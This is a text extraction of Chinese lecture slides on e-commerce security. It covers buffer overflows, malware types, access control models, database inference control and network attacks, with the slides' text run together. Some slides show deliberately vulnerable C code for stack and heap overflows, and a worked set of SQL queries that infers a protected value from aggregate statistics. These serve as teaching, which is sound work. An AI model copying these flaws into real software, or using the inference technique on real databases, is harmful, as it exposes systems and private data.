第3章-电子商务安全技术(8课时)

第3章电子商务安全技术9/7/20231第3章电子商务安全技术安全目标和威胁的对象计算机安全包含三个重要的安全目标：机密性、完整性、可用性。多数威胁都是以破坏机密性、完整性和可用性为目标。威胁实施者主要包括：自然现象、偶然事件、无恶意的用户和恶意攻击者。威胁的对象主要包括软件、硬件、数据和通信线路这四种资源。9/7/20232第3章电子商务安全技术适度安全准则上述三个安全目标之间可能存在彼此矛盾。在安全目标中找到一个恰当的平衡点。根据实际需要，提供适度的安全目标加以实现；计算机资源被保护的程度应该与它们的价值是一致的。9/7/20233第3章电子商务安全技术机密性与可用性的平衡关系机密性可用性平衡点9/7/20234第3章电子商务安全技术第3章电子商务安全技术3.1程序安全3.2操作系统安全3.3数据库安全3.4网络安全

9/7/20235第3章电子商务安全技术3.1程序安全3.1.1程序漏洞3.1.2恶意代码9/7/20236第3章电子商务安全技术3.1.1程序漏洞三种典型的非恶意程序漏洞：缓冲区溢出；不完全输入验证；“检查时刻到使用时刻”错误

9/7/20237第3章电子商务安全技术缓冲区溢出缓冲区是一个用于存储数据并且容量有限的内存空间。1 charbuffer[10];2for(i=0;i<=10;i++)3buffer[i]=‘A’;在数据存储过程中，若超过了缓冲区的最大容量，则将发生缓冲区溢出。缓冲区溢出是最为常见的一种安全漏洞。

缓冲区溢出的位置可以出现在任何地方，如堆栈、堆和静态数据区等。9/7/20238第3章电子商务安全技术目标程序运行时存储区的典型划分

Code（代码区）Staticdata（静态数据区）Stack（堆栈）

Heap（堆）用以存放目标代码，代码区长度是固定的，即编译时能确定的。它是只读的，不能存储程序变量用以存放编译时就能确定所占用空间的数据。可用于存储程序的变量，可读写。用于保存可变数据以及管理过程活动的控制信息。9/7/20239第3章电子商务安全技术缓冲溢出（续）当出现缓冲溢出，运行的程序可能以下三种情况：运行正常被覆盖的是无用数据，并且没有发生访问违例；运行出错包括输出错误和非法操作等；受到攻击，程序开始执行有害代码。攻击者精心设计覆盖哪些数据以及用什么数据来覆盖。9/7/202310第3章电子商务安全技术缓冲区溢出攻击方法攻击者可以利用缓冲区溢出漏洞，恶意造成缓冲区溢出:1.将对应于机器代码指令的数据写入到缓冲区从而将攻击代码植入到被攻击程序的地址空间；2.攻击者通过寻求触发攻击代码的方法来获得目标系统的控制权。9/7/202311第3章电子商务安全技术获得目标系统控制权的方法获得目标系统控制权的最常见手段：修改堆栈指针修改返回地址。

9/7/202312第3章电子商务安全技术运行时的堆栈分配实参状态信息局部变量动态的局部变量分配在堆栈里面函数返回时，弹出返回地址以继续执行程序栈顶返回地址其他数据栈底9/7/202313第3章电子商务安全技术实参状态信息局部变量栈顶返回地址缓冲区溢出发生在堆栈空间溢出到返回地址单元，从而覆盖返回地址。攻击者通过将其所希望的返回地址写入到堆栈空间，来改变堆栈中原来的返回地址。其他数据9/7/202314第3章电子商务安全技术stack缓冲区溢出例子voidOutputString(char*str){ charbuffer[8];strcpy(buffer,str);printf("Inputis%s\n",buffer);}intmain(intargc,char**argv){OutputString(argv[1]);return0;}执行命令：./stackoverflowAAAAA……9/7/202315第3章电子商务安全技术Stack溢出实例结果实参AAAA状态信息AAAAbuffer栈顶返回地址AAAAA溢出到返回地址单元。8个字节栈底9/7/202316第3章电子商务安全技术Heap区缓冲区溢出Heap就是由应用程序申请动态分配的内存区。在编译的时候被初始化。目标程序运行时，对内存的动态申请是发生在Heap(堆)里的。C语言可以采用malloc()从Heap中申请相应的空间，采用free()释放相应的空间；C++语言可以采用new()从Heap中申请相应的空间，采用delete()释放相应的空间；9/7/202317第3章电子商务安全技术Heap区缓冲区溢出实例

#include<stdio.h>

#include<stdlib.h>

#include<unistd.h>

#include<string.h>

#defineBUFSIZE16#defineOVERSIZE8/*将覆盖buf2的前OVERSIZE个字节*/intmain(){u_longdiff;9/7/202318第3章电子商务安全技术Heap区缓冲区溢出实例（二）char*buf1=(char*)malloc(BUFSIZE);char*buf2=(char*)malloc(BUFSIZE);diff=(u_long)buf2-(u_long)buf1;printf("buf1=%p,buf2=%p,diff=%dbytes\n",buf1,buf2,diff);memset(buf2,'A',BUFSIZE-1);buf2[BUFSIZE-1]='\0';printf("beforeoverflow:buf2=%s\n",buf2);memset(buf1,'B',(u_int)(diff+OVERSIZE));printf("afteroverflow:buf2=%s\n",buf2);……return0;}9/7/202319第3章电子商务安全技术溢出前Heap区分配

buf1A…A15个Abuf2/0输出结果：beforeoverflow:buf2=AAAAAAAAAAAAAAA15个A9/7/202320第3章电子商务安全技术溢出后Heap区分配B…Bbuf1BB…BA…Abuf2的前8个字节被覆盖了

buf216个B7个AB溢出到该区域/09/7/202321第3章电子商务安全技术防御手段

基于探测方法的防御措施：返回地址“探测”值编程人员采用具有抵抗力的标准库各种方法都有局限性，因此要求人员编写无缺陷的软件。9/7/202322第3章电子商务安全技术不完全输入验证

当程序接受到被认为不可能出现的输入时，程序将可能会出现故障。避免不完全输入验证的最重要的规则就是：一个安全的程序不应该完全信任来自外界的任何输入，所有输入数据在使用之前必须要通过合法性检查。

9/7/202323第3章电子商务安全技术不完全输入验证攻击

9/7/202324第3章电子商务安全技术避免不完全输入验证攻击加强程序的输入验证。注意程序设计的合理性：不应该将敏感参数处于公开状态，以避免敏感参数被恶意篡改。9/7/202325第3章电子商务安全技术“检查时刻到使用时刻”错误并发进程可能会共享某些资源。程序所访问的资源状态可能会在某段时间内被其他进程所改变。

9/7/202326第3章电子商务安全技术顺序执行程序1:X=2;X=X+1;程序2:X=5;程序2程序1输出结果：X=3输出结果：X=59/7/202327第3章电子商务安全技术并发执行(一)X=2X=5X=X+1程序1程序2X=?时间9/7/202328第3章电子商务安全技术并发执行（二）X=2X=5X=X+1程序1程序2X=?时间9/7/202329第3章电子商务安全技术“检查时刻到使用时刻”错误X状态S检查状态S使用状态SY时间t1t29/7/202330第3章电子商务安全技术防御手段减小[t1，t2]时段内的代码大小和运行时间。模拟原子操作方法：将检查到使用阶段之间的所有代码作为一个临界区。9/7/202331第3章电子商务安全技术临界区域时间t1t2进入区临界区退出区9/7/202332第3章电子商务安全技术3.1.2恶意代码

恶意代码是以破坏为目的一类程序，它只有在执行时才造成不期望的结果。恶意代码包括： 病毒、蠕虫、特洛伊木马和隐蔽通道等。

9/7/202333第3章电子商务安全技术病毒计算机病毒是一个程序可以将恶意代码分发到其他文件或电脑中具有自我复制的能力被感染的程序将成为新的传染源，继续传播病毒隐蔽性9/7/202334第3章电子商务安全技术病毒的分类按寄生方式分类：a)引导区病毒b)文件型病毒c)混合型病毒按传染途径分类：a)驻留内存型b)不驻留内存型9/7/202335第3章电子商务安全技术引导区病毒（一）引导区其他扇区引导程序装载器

系统初始化

(a)感染前

9/7/202336第3章电子商务安全技术引导区病毒(二）(b)感染后引导区其他扇区引导程序装载器

系统初始化

病毒代码9/7/202337第3章电子商务安全技术文件型病毒文件型病毒以感染可执行程序为主。文件型病毒的安装必须借助于病毒的载体程序把文件型病毒引人内存。大多数文件型病毒都常驻在内存中。文件型病毒会自我复制，可以感染系统中的其他程序。9/7/202338第3章电子商务安全技术蠕虫蠕虫是一种可以通过网络大量传播自身拷贝的恶意代码。它可以在没人干涉的情况下自动运行。它的自身拷贝是以独立程序的形式来传播的。而病毒的自身拷贝必须嵌入到其他程序中来传播。

9/7/202339第3章电子商务安全技术特洛伊木马它是一种恶意代码。它除了程序所具有的基本功能之外，还有一些不被人发觉的破坏行为。不能自行传播。病毒或蠕虫可用于将特洛伊木马作为攻击负载的一部分复制到目标系统上。9/7/202340第3章电子商务安全技术隐蔽通道它是一种允许进程以危害系统安全策略的方式传输信息的通信信道。它可以避开系统的自主访问控制机制机制，通过一个秘密的通信路径将敏感信息传送给非法用户。9/7/202341第3章电子商务安全技术隐蔽通道敏感数据服务程序共享文件合法用户非法用户间谍进程9/7/202342第3章电子商务安全技术隐蔽通道泄露消息100上锁（1）否：0是否上锁？是：1服务程序文件间谍进程时间时段1不上锁（0）是否上锁？服务程序文件间谍进程时段2否：0不上锁（0）是否上锁？服务程序文件间谍进程时段3为了传递不止一位的信息，服务程序和接受程序需要每个时间间隔传递一位信息。9/7/202343第3章电子商务安全技术隐蔽通道的危害通道带宽：每秒传递的比特数。它可用来测量隐蔽通道传送信息的速度(危害程度)。带宽越大，信息的泄密速度也越快，泄密的可能性也就越大。容量和速度不会成为信息流的限制条件。9/7/202344第3章电子商务安全技术预防程序漏洞的方法 系统开发者可以采用软件工程提出的控制方法有效地限制开发人员的活动：

a)严格的设计复查b)代码检查c)代码测试9/7/202345第3章电子商务安全技术习题P.8419/7/202346第3章电子商务安全技术3.2操作系统安全操作系统提供了保护用户计算的方法,这些方法主要包括:a)访问控制

b)用户鉴别/验证9/7/202347第3章电子商务安全技术访问控制用户引用监控器客体授权数据库管理人员验证访问控制9/7/202348第3章电子商务安全技术3.2.1访问控制策略

当前主要有以下三种访问控制策略：a)自主访问控制策略b)强制访问控制策略c)基于角色访问控制策略9/7/202349第3章电子商务安全技术自主访问控制根据主体身份控制主体对客体的访问。主体可以拥有将客体的访问权限自主传递给其他主体的权利；也具有自主决定从其他主体那里回收他所授予访问权限的权利。9/7/202350第3章电子商务安全技术自主访问控制的特点自主访问控制的自主性为主体提供了简单、灵活的客体访问方式。它在一定程度上实现了多用户环境下的权限隔离和资源保护。易于扩展和理解，可适合于许多系统和应用。不能抵御特洛伊木马的攻击。较难限制访问权限的传递，容易产生安全隐患。9/7/202351第3章电子商务安全技术强制访问控制系统中每个主体和客体均指派一个安全等级。强制访问控制依据主体和客体的安全等级来决定主体是否有对客体的访问权。中央授权系统决定哪些信息可被那些用户访问，而用户不能改变访问权。访问控制策略的判决不受主体的拥有者的控制。9/7/202352第3章电子商务安全技术安全等级客体的安全等级通常反映了包含在客体内的信息的敏感程度。主体的安全等级通常反映了主体的可信赖程度。安全等级构成一种偏序关系。9/7/202353第3章电子商务安全技术保护信息机密性的原则向下读：主体的许可级别至少和所读客体的安全等级一样高。向上写：主体的许可级别不能高于所修改客体的安全等级。9/7/202354第3章电子商务安全技术信息机密性向高上写

安全等级

向写下读读低

S2O3O2O1S41级2级3级4级9/7/202355第3章电子商务安全技术例：系统中有用户U1、U2、U3、U4、U5，有文件F1、F2、F3、F4、F5；采用基于安全等级的强制访问控制策略，安全等级如下(级数越大安全级别越高)：

3级：U1、F12级：U3、F3、U51级：U2、U4、F2、F4、F5

请分别列出U1、U2、U3、U4、U5能读哪些文件、能写哪些文件

9/7/202356第3章电子商务安全技术例：U1能读：F1、F3、F2、F4、F5；能写：F1

U2能读：F2、F4、F5；

能写：F2、F4、F5、F3、F1U3能读：F3、F2、F4、F5；

能写：F3、F1U4能读：F2、F4、F5；

能写：F2、F4、F5、F3、F1U5能读：F3、F2、F4、F5；

能写：F3、F19/7/202357第3章电子商务安全技术“向上写”的原则局限“向上写”的原则使得低安全等级的主体破坏高安全等级客体内的敏感数据成为可能，它忽略了数据的完整性。它限制了高安全等级主体向非敏感客体写数据的合理要求，降低了系统的可用性。9/7/202358第3章电子商务安全技术完整等级和客体关联的完整等级反映了对存储在客体内信息的信赖程度以及由于对这些信息的非授权修改而引起的潜在损害程度，它反映了客体对修改操作的敏感等级。和主体关联的完整等级反映了主体对相应级别客体进行修改操作的可信赖等级。9/7/202359第3章电子商务安全技术保护信息完整性的原则向上读：主体的完整等级不能高于所读取客体的完整等级。向下写：主体的完整等级至少和所修改客体的完整等级一样高。9/7/202360第3章电子商务安全技术信息完整性

向高上读

完整等级向写下读写低O4O3S1O2S31级2级3级4级9/7/202361第3章电子商务安全技术例：系统中有用户U1、U2、U3、U4、U5，有文件F1、F2、F3、F4、F5；采用基于安全等级的强制访问控制策略，完整等级如下(级数越大完整性级别越高)：

3级：U1、F12级：U3、F3、U51级：U2、U4、F2、F4、F5

请分别列出U1、U2、U3、U4、U5能读哪些文件、能写哪些文件?

9/7/202362第3章电子商务安全技术例：U1能写：F1、F3、F2、F4、F5；能读：F1

U2能写：F2、F4、F5；

能读：F2、F4、F5、F3、F1U3能写：F3、F2、F4、F5；

能读：F3、F1U4能写：F2、F4、F5；

能读：F2、F4、F5、F3、F1U5能写：F3、F2、F4、F5；

能读：F3、F19/7/202363第3章电子商务安全技术强制访问控制的优点和不足能够防止特洛伊木马和隐蔽通道的攻击。它适合于通过权威中心进行严格访问控制的环境，可以防范用户滥用权限。缺乏灵活性，应用的领域也比较窄，一般只用于军方等具有明显等级观念的行业或领域。9/7/202364第3章电子商务安全技术强制访问控制防止隐蔽通道攻击敏感数据服务程序共享文件合法用户非法用户间谍进程安全等级高低9/7/202365第3章电子商务安全技术MAC和DAC的不足它们主要是直接在用户和客体的访问权限之间建立授权关系。针对用户个体或用户组的权限管理负担巨大、可操作性和可管理性较低，容易出错。9/7/202366第3章电子商务安全技术基于角色访问控制

U用户R角色P权限用户－角色分配角色－权限分配角色层次9/7/202367第3章电子商务安全技术RBAC的特点实现了用户和访问权限的逻辑分离，用户通过角色获得其享有的权限，而不是直接将权限授予给用户。可以通过改变用户与角色的关联而方便地改变用户的访问权限。适合大型多用户管理信息系统的授权管理。容易实施最小特权原则。9/7/202368第3章电子商务安全技术3.2.2访问控制实现技术访问控制决定了每个主体对客体的访问权限。描述主体对客体访问权限的最为方便的方法就是采用访问控制矩阵。访问控制的任务就是确保每个主体只能执行那些被访问控制矩阵授权的操作。9/7/202369第3章电子商务安全技术访问控制矩阵客体主体MyFileMyFile1PrinterUSER_AReadExecuteReadWriteUSER_BReadOwnerReadWrite

9/7/202370第3章电子商务安全技术访问控制矩阵的实现访问控制矩阵将占用巨大的存储空间。访问控制矩阵为稀疏矩阵。访问控制矩阵实现:a)访问控制表

b)访问能力表

c)授权关系

9/7/202371第3章电子商务安全技术访问控制表ACL客体名用户名访问权限USER_AReadExecuteUSER_BRead

ExecuteWriteOwner*Read

访问控制表Myfile9/7/202372第3章电子商务安全技术例：已知文件Myfile的访问控制表如下。求USER_A、USER_B和USER_C对文件Myfile的访问控制权限。

9/7/202373第3章电子商务安全技术例：USER_A对Myfile的访问控制权限为读/Read、执行/ExecuteUSER_B对Myfile的访问控制权限为：读/Read、执行/Execute、写/Write、拥有/OwnerUSER_C对Myfile的访问控制权限为：读/Read9/7/202374第3章电子商务安全技术访问控制表特点容易回收某个客体的所有访问权限。若希望查找或回收某个主体的所有访问权限时，则需要查找系统中所有客体的访问控制表。多数集中式操作系统使用ACL方法或类似方式。9/7/202375第3章电子商务安全技术访问能力表CL主体名客体名访问权限MyFileReadExecuteMyFile1Read访问能力表USER_A类型文件文件PrinterWrite打印机9/7/202376第3章电子商务安全技术例：则U1对F1的访问权限为（）、对F2的访问权限为（）、对F3的访问权限为（）。访问能力表如下：

9/7/202377第3章电子商务安全技术例：读

或R

读,写

或RW

读,写,执行,拥有

或RWXO9/7/202378第3章电子商务安全技术访问能力表的特点回收某个客体的所有访问权限不容易。当系统删除某个客体时，则需要查找每个主体的访问能力表。分布式系统也较难为某个客体指定它潜在的主体集。因此在现代操作系统中访问能力表得到了广泛的应用。9/7/202379第3章电子商务安全技术授权关系(表)主体访问权限客体USER_AReadExecuteMyFileUSER_AReadMyFile1USER_AWritePrinterUSER_BReadOwnerMyFile9/7/202380第3章电子商务安全技术3.2.3Unix操作系统的文件保护机制

主体划分为三个等级：a)文件所有者b)用户组:用户组成员是根据对资源的共享需求而组合起来的，组内各成员之间也存在着彼此的信任关系c)其他用户。每个文件只有一个所有者9/7/202381第3章电子商务安全技术文件所有者文件所有者可以定义用户本人对该文件的访问权限。文件所有者可以随时定义或撤销其他用户的访问权限。文件的访问权限由文件属性决定。9/7/202382第3章电子商务安全技术文件属性文件属性包括文件许可、文件所有者、文件相关组名、文件长度、文件名。文件许可分为以下4部分：

d

rwx

rwx

rwx

文件类型所有者的访问权限用户组的访问权限其他用户访问权限9/7/202383第3章电子商务安全技术

GroupA文件访问控制MyFile文件属性：-rwxr-xr--UserB

GroupA所有者名文件许可文件相关组名UserAUserB访问9/7/202384第3章电子商务安全技术例：在Unix系统中，文件f1的属性如下：

－rwxr－xr――UserBGroupB1024f1用户UserA在属于用户组GroupA，用户UserB和UserC属于用户组GroupB。求用户UserA、UserB和UserC对文件f1的访问权限。

9/7/202385第3章电子商务安全技术例：UserA：RUserB：R、W、XUserC：R、X或UserA：读

UserB：读、写、执行UserC：读、执行

9/7/202386第3章电子商务安全技术目录ABfile目录许可子目录许可文件许可9/7/202387第3章电子商务安全技术习题P.845,79/7/202388第3章电子商务安全技术3.3数据库安全

3.3.1数据库管理系统3.3.2安全需求3.3.3数据库访问控制3.3.4完整性约束3.3.5推理控制3.3.6秘密通道3.3.7数据库加密3.3.8数据库用户管理9/7/202389第3章电子商务安全技术3.3.1数据库系统应用程序数据库管理系统DBMS数据库数据库管理员a)共享的数据集合b)按指定的组织形式保存实现数据库系统的各种功能负责数据库的规划、设计、协调、维护和管理9/7/202390第3章电子商务安全技术关系数据库关系数据库是表或者关系的集合关系是通过关系模式来描述的，关系包括关系名、组成该关系的属性名等。如客户信息表的关系模式：Customer（UID，Name，Address）数据库中所有关系模式的集合，构成了数据库模式9/7/202391第3章电子商务安全技术关系实例UIDName050102张华

客户表Customer：元组属性分量属性的域为char(50)Address广东路9/7/202392第3章电子商务安全技术客户基本信息表CustomerUIDNameAddress050101李其上海路050102张华

广东路050103赵伟北京路050104孙林江苏路9/7/202393第3章电子商务安全技术订单信息表Order

IDUIDPIDPriceBIDAccount1050101A330101012050102B560202013050103C450202024050104B500202035050102A400202016050103B560202027050102C500202018050104C450101029/7/202394第3章电子商务安全技术3.3.2数据库安全需求

数据库的物理完整性：预防数据库中的数据不会受到物理方面故障的影响，能够重构遭受到破坏的数据库。数据库的逻辑完整性：保护数据库的逻辑结构。可审计性：能够跟踪用户对数据库中数据的访问或修改活动。9/7/202395第3章电子商务安全技术数据库安全需求（续）用户验证：每个用户访问数据库之前，必须要通过系统的身份验证。访问控制：控制用户的访问权限，确保用户只能读取或修改被授权的数据。可用性：保证用户可以访问数据库中的授权数据。但数据库中的数据并不是任何用户在任何时候都可以访问的。需要注意的是：防止出现拒绝服务的现象。9/7/202396第3章电子商务安全技术3.3.3数据库访问控制

它可以使用户访问一些公共的数据集。数据库系统必须能够限制各个用户的访问范围。

操作系统数据库数据对象独立的对象数据对象之间存在语义关系推理攻击不容易可以颗粒度大更小9/7/202397第3章电子商务安全技术3.3.3数据库访问控制

DBMS可以采用授权表保存数据库用户对数据对象的访问权限。用户标识数据对象访问权限表、视图、属性9/7/202398第3章电子商务安全技术视图视图是它是基本表或视图的一个子集它不同于基本表，只是一个虚表。数据库管理员可以利用视图限制用户的访问范围。表导出视图视图9/7/202399第3章电子商务安全技术视图例子——客户基本信息表CustomerUIDNameAddress050101李其上海路050102张华

广东路050103赵伟北京路050104孙林江苏路9/7/2023100第3章电子商务安全技术视图例子——订单信息表Order

IDUIDPIDPriceBIDAccount1050101A330101012050102B560202013050103C450202024050104B500202035050102A400202016050103B560202027050102C500202018050104C450101029/7/2023101第3章电子商务安全技术视图例子——送货视图view1IDPIDUIDNameAddress1A050101李其上海路2B050102张华

广东路3C050103赵伟北京路4B050104孙林江苏路5A050102张华广东路6B050103赵伟北京路7C050102张华广东路9/7/2023102第3章电子商务安全技术3.3.4完整性约束

完整性约束描述了数据对象的约束条件。它主要分为以下两类：静态约束是对数据库状态的约束。它可以限制属性值的域以及属性值的唯一性，也可以限制属性之间的关系。动态约束描述了数据库从一个状态转换为另一个状态的约束，它由应用程序员显式地定义。9/7/2023103第3章电子商务安全技术完整性约束的检验完整性约束的检验是伴随着数据库插入或更新操作进行的。如：UpdateAccountsetbalance=balance–20whereaccountID=1；DBMS将拒绝不满足完整性约束的所有数据库插入或更新操作。9/7/2023104第3章电子商务安全技术3.3.5推理控制

推理是指用户通过间接的方式获取其不该访问的数据。推理控制的目的就是防止用户通过推理方式来窃取敏感数据。9/7/2023105第3章电子商务安全技术存在和缺失

存在和缺失透露敏感数据项的存在以及该数据项和屏幕上其他数据的关联信息。客户标识客户名

地址信用度050101李其上海路*050102张华

广东路*缺失9/7/2023106第3章电子商务安全技术直接攻击

攻击者可以通过直接查询敏感属性并根据返回的少量元组来获取敏感属性值。如：SelectUIDfromOrderwhereAccount=0201andPID=‘B’查询结果：CustomID050102敏感域9/7/2023107第3章电子商务安全技术逻辑或代数运算

利用非敏感数据和敏感数据之间的语义关联，并通过逻辑或代数运算推断出用户不可访问的数据。消费金额范围客户等级敏感数据非敏感数据9/7/2023108第3章电子商务安全技术统计推理

统计攻击就是攻击者根据收集到的线索或数据特征，利用各种统计方法推断出个体数据中的敏感信息。线索或数据特征统计推理统计数据敏感信息9/7/2023109第3章电子商务安全技术统计推理实例NameSalary OccupationZhang3000经理Li2000员工Zhao1000员工STAT表9/7/2023110第3章电子商务安全技术通用追踪器通用追踪器是一个谓词T，它满足下面的条件：

：为谓词T所限定的元组集合b为每个查询结果的最少元组数9/7/2023111第3章电子商务安全技术通用追踪器——原理SET(T)SET(NOTT)abdec

SET(P)={bc}9/7/2023112第3章电子商务安全技术通用追踪器——找出一个通用追踪器T的方法试探一个通用追踪器T2b<=|Set(T)|<=(n-2b)确定通用追踪器TYesNo9/7/2023113第3章电子商务安全技术通用追踪器——推理过程分别查询Set(T)和Set(NotT)的统计数据

查询Set(PORT)的统计数据

查询Set(PORNotT)的统计数据

利用获得统计数据，计算Set(P)的结果9/7/2023114第3章电子商务安全技术通用追踪器实例（一）IDPIDPriceBID1A33012B56023C45024B50025A40026B56027C50028C4501已知P为:PID=”A”andBID=”01”9/7/2023115第3章电子商务安全技术通用追踪器实例（二）先用谓词ID<5来试探,以找出通用追踪器T。Q1:SelectCount(*)fromOrderwhereID<5;结果：4Q2:SelectCount(*)fromOrderwhereNOT(ID<5);结果：4当b=2时，Q1、Q2的查询结果满足条件(n=4+4=8):2b<=|SET(T)|<=(n-2b)所以ID<5可以作为通用追踪器。9/7/2023116第3章电子商务安全技术通用追踪器实例（三）Q3:SelectSUM(Price)fromOrderwhere(PID=”A”andBID=”01”)ORID<5;结果:184Q4:SelectSUM(Price)fromOrderwhere(PID=”A”andBID=”01”)ORNOT(ID<5);结果:224Q5:SelectSUM(Price)fromOrderwhereID<5;结果:184Q6:SelectSUM(Price)fromOrderwhereNOT(ID<5);结果:191根据通用追踪器计算公式可得到price=184+224–184-191=33。9/7/2023117第3章电子商务安全技术Account表在某一时刻的内容如下：账号

银行名

存款余额aid bname balance1001 中国银行 1002001 工商银行 2001002 中国银行 5003001 建设银行 2004001 农业银行 3001003 中国银行 2001004 中国银行 3003002 建设银行 100balance列不能直接查询，且统计查询的行数C满足：2≤C≤n-2；采用通用追踪器求aid=1001的存款余额balance。

9/7/2023118第3章电子商务安全技术防御推理攻击 当前防御推理攻击较为实用的技术大致包括：采样法数据扰乱禁止明显的敏感数据查询控制9/7/2023119第3章电子商务安全技术采样法

数据库样本数据统计结果随机抽取统计近似值应该选取足够的样本。9/7/2023120第3章电子商务安全技术数据扰乱

数据扰乱是指只用一个随机数据修改数据库表中的某个属性值，从而使最终的统计数据接近真实值，而又不是精确值。姓名工资zhang3000+ѡLiu2000+ѡSTATѡ为随机数统计结果统计近似值9/7/2023121第3章电子商务安全技术禁止明显的敏感数据

隐藏或者不显示特定存储单元的内容，拒绝那些涉及敏感域的查询，防止这些信息被用来进行推理攻击。缺点：可能会拒绝许多合理的查询，降低了数据的可用性。

9/7/2023122第3章电子商务安全技术查询控制

主要是对查询结果中的元组数进行控制。返回的元组数results∊[k,n-k]缺点：无法防止多个攻击者通过组合已知的查询结果窃取数据的情形。无法防止一个攻击者通过组合当前的查询结果和历史的查询结果窃取数据的情形。9/7/2023123第3章电子商务安全技术3.3.6秘密通道

更新处理元组封锁搜索处理查询正在进行更新低安全等级的处理应该不能够区分系统中是否存在一个高安全等级的处理。9/7/2023124第3章电子商务安全技术3.3.7数据库加密

数据库管理系统数据库的文件窃取存储攻击9/7/2023125第3章电子商务安全技术数据库加密的基本要求（一）

性能要求:加密处理过程不应导致数据库系统性能的明显降低。对合法用户操作的影响:加密系统对合法用户的操作应该是透明的。密钥管理：与一般的加密系统相同，要求密钥管理机制，并要求更加灵活和坚固。9/7/2023126第3章电子商务安全技术数据库加密的基本要求（二）对加密强度的要求：数据库数据的加密技术对强度的要求是最主要的。合理加密数据：加密方法要保证密文的数据类型不会改变，密文也只能在该属性的域内，密文长度也不能超过该属性限定的长度。尽量不增加数据文件所需的存储空间。9/7/2023127第3章电子商务安全技术数据库加密技术限制

数据库关系运算的比较属性不宜加密表间连接码属性不宜加密索引属性不宜加密。

数据库数据加密会影响DBMS的一些功能。比如SQL语言中Select语句中的分组（groupby）、排序（orderby）、分类（having）子句以及完整性约束条件均不能直接作用于密文数据。9/7/2023128第3章电子商务安全技术数据库加密层次

应用层加密数据库层加密文件/存储层加密密文明文9/7/2023129第3章电子商务安全技术应用层加密

应用层加密允许企业在应用逻辑中选择加密粒度以及加/解密在应用逻辑中的位置。数据库服务器应用数据库密文密文9/7/2023130第3章电子商务安全技术应用层加密优势和限制优势：可以防御攻击者实施的存储攻击以及对数据库管理系统进行的攻击。限制：在应用的设计和实现阶段，开发者就必须确定应用需要访问哪些加密数据。要求访问加密数据的所有应用都能够支持加解密处理。应用层加密数据将影响到存储过程和触发器这类数据库对象的执行，从而使得应用层的加密功能受到一些限制。

9/7/2023131第3章电子商务安全技术数据库层加密

所有数据的加/解密及密钥管理工作都在数据库管理系统内进行，它可以和数据库的访问控制自然结合，以抵御对数据库实施的各种攻击。数据库层加密避免了对应用的影响。加密粒度可以选择：表、元组、属性但由于加密数据与加密密钥信息同时放在数据库中，因此对加密密钥的管理带来了极大的困难，同时也加重了数据库服务器的负载。9/7/2023132第3章电子商务安全技术文件/存储层加密文件/存储层加密是在文件层次或在块的层次上对存储子系统内的数据进行加密。对于这种依赖于操作系统进行数据管理的数据库管理系统，文件/存储层加密是这些数据库通常采用的策略。数据库管理系统加/解密数据处理数据文件明文密文9/7/2023133第3章电子商务安全技术文件/存储层加密限制它只能防御对存储系统的攻击。当前的存储安全机制只能提供块级加密，不能够在应用或数据库内向企业提供字段级的加密这种方法只能加密整个数据库或数据表，而不能只对数据库内特定信息加密。DBMS在查找数据时必须要对全部数据进行解密操作，系统常常需要付出较大的时空代价。9/7/2023134第3章电子商务安全技术3.3.8数据库用户管理

普通数据库用户：它的访问权限最低，按照授权可以查询、删除或更新数据库的数据。具有支配部分数据库资源特权的用户：它可以授予或收回其他数据库用户对其所创建的数据对象的访问权限。具有DBA特权的数据库用户：DBA拥有控制整个数据库资源的特权，它不但可以动态授予或收回数据库其他用户对数据对象的访问权，还提供对其他数据库用户的注册、注销功能。9/7/2023135第3章电子商务安全技术分割DBA的权限的必要性数据库管理员拥有访问数据库并执行大部分数据库管理操作的特权。数据库管理员仍可以通过其管理员的特权修改用户口令，并假冒其他用户访问数据库数据。限制DBA的权限：由几个用户共同来完成系统管理的工作，其中一种解决方法就是设立安全管理员。9/7/2023136第3章电子商务安全技术安全管理员安全管理员DBA安全管理DBA任务增加或删除用户通常的DBA任务具有用户管理权限具有通常数据库管理功能9/7/2023137第3章电子商务安全技术习题

P.85:8,10,119/7/2023138第3章电子商务安全技术3.4网络安全

各种电子商务业务可以通过Internet进行。Internet是一个开放的、无控制机构的网络。网络安全问题成为各种网络服务和应用能否进一步发展的关键问题之一。网络安全是信息系统安全的基础。网络安全：确保网络数据的可用性、完整性和保密性。

9/7/2023139第3章电子商务安全技术3.4网络安全3.4.1网络的安全威胁3.4.2虚拟专用网络3.4.3防火墙3.4.4入侵检测系统9/7/2023140第3章电子商务安全技术3.4.1网络的安全威胁——端口扫描信息收集是突破网络系统的第一步。信息收集的一种简单方法是采用端口扫描。端口扫描器程序是一个可自动检测并初步分析远程或本地主机安全性弱点的程序。请求响应消息发现目标主机类型和相应漏洞端口扫描器程序9/7/2023141第3章电子商务安全技术窃听

AB嗅探器被动窃听：攻击者只是截取通信数据，然后综合分析截获的数据以获取敏感信息。主动窃听：攻击者在截取通信数据之后，还要在截获的信息中注入他自己的信息。9/7/2023142第3章电子商务安全技术假冒

假冒是另外一种截取网络信息的方法，它是指一个实体冒充另一个合法的实体。攻击者要想冒充一个合法的用户，他首先试图窃取该主机的一个账号和密码。获得普通用户账号的方法：Finger命令、默认账户。破译用户的密码的方法：字典穷举法、默认账号的默认口令、通过窃听技术获取用户身份和鉴别细节。假冒一个不需要鉴别的主体是实施假冒攻击的另外一条有效途径。9/7/2023143第3章电子商务安全技术假冒——信任关系信任关系攻击者入侵入侵信任关系可以使得已经通过用户所在域主机鉴别的用户进行主机对主机的连接，而不需要再次鉴别，9/7/2023144第3章电子商务安全技术欺骗

欺骗是指一个攻击者在网络的另一端以不真实的身份与你交互。在假冒方式中，攻击者扮演了一个合法的实体。伪装、会话劫持和中间人攻击都属于欺骗攻击。真正Web网站的域名：AbcB相似Web网站的域名:Abc-B受害者引诱9/7/2023145第3章电子商务安全技术会话劫持真正Web网站攻击者网站受害者浏览售货清单截取我要付款获取用户地址、信用卡认为用户没有购买会话劫持是一种结合了窃听及欺骗技术在内的攻击手段，它是指截取并维持一个其他实体开始的会话。9/7/2023146第3章电子商务安全技术中间人攻击中间人攻击可以暗中改变会话双方的通信流，并且使得会话双方毫无察觉。在会话劫持中，要求在两个实体之间进行的会话有第三方介入，会话劫持发生在一个会话建立之后，而中间人攻击通常在会话的开始就参与进来了。其实会话劫持和中间人攻击的区别仅仅是一种语义上的区别，在实际上没有多大意义。9/7/2023147第3章电子商务安全技术中间人攻击——网页欺骗例子1请求篡改过的URL3初始页面内容5伪装后的页面内容4更改

页面内容受害主机浏览器Web服务器9/7/2023148第3章电子商务安全技术软件漏洞

